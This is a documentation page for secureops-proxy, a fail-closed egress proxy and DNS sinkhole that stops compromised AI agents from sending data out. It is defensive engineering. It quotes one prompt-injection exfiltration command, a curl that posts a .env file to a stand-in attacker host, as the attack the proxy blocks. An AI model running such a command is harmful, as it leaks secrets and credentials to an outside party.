secureops-proxy 0.0.1

SecureOps egress PEP: forward proxy + DNS sinkhole, fail-closed (PRODUCT.md B.5).
Documentation

secureops-proxy — the egress PEP (Policy Enforcement Point)

This crate is the single highest-impact enforcement component in SecureOps: it neutralizes data exfiltration regardless of how the agent was compromised (PRODUCT.md Part D headline, Part E P0). All outbound agent traffic is funneled through a local forward proxy and a local DNS sinkhole; each connection is authorized by the PDP ([secureops_policy]) before a single byte leaves the box.

The headline path (PRODUCT.md B.5)

  1. Agent (Ring 0) attempts an outbound connection. DNS goes to the local [DnsSinkhole]; raw connects are routed to the local [EgressProxy] (transparent redirect or explicit HTTPS_PROXY).
  2. The proxy reads the SNI / requested hostno MITM, no certificate interception by default (see [PeekedHost]) — and asks the PDP: is this destination allowed for this process?
  3. The PDP evaluates policy + accumulated per-PID process context (e.g. "this PID openat'd a credential file 200ms ago") and returns [Decision::Allow], [Decision::Deny], or [Decision::Escalate].
  4. Deny => hard RST; the bytes never leave the box (0 bytes exfiltrated). Allow => the connection proceeds. Either way, exactly one entry is written to the signed audit log with the PID/host/decision attached.

Concretely, this turns the canonical prompt-injection exfil curl -d @.env attacker.com from "we'd have a log of it afterward" into "it didn't happen" — the unknown host is hard-RST at the proxy (PRODUCT.md Part D, row 1).

Fail-closed is the contract (PRODUCT.md W0)

The egress proxy + DNS sinkhole are the only cross-platform enforcement primitives (✓ on Linux/macOS/Windows). Kernel-level inline deny is uneven: Linux has LSM-BPF, macOS Endpoint Security is mostly observe-only, Windows uses a WFP callout. The subphase rule is therefore non-negotiable:

Where a platform can only observe, the daemon must fail-closed at the proxy rather than pretend it has kernel deny.

In this crate that means: any error, PDP timeout, PDP-unreachable, or unknown destination resolves to a hard RST / sinkholed answer — never to an open connection. See [FailMode] (defaults to [FailMode::Closed]) and [EgressProxy::on_error].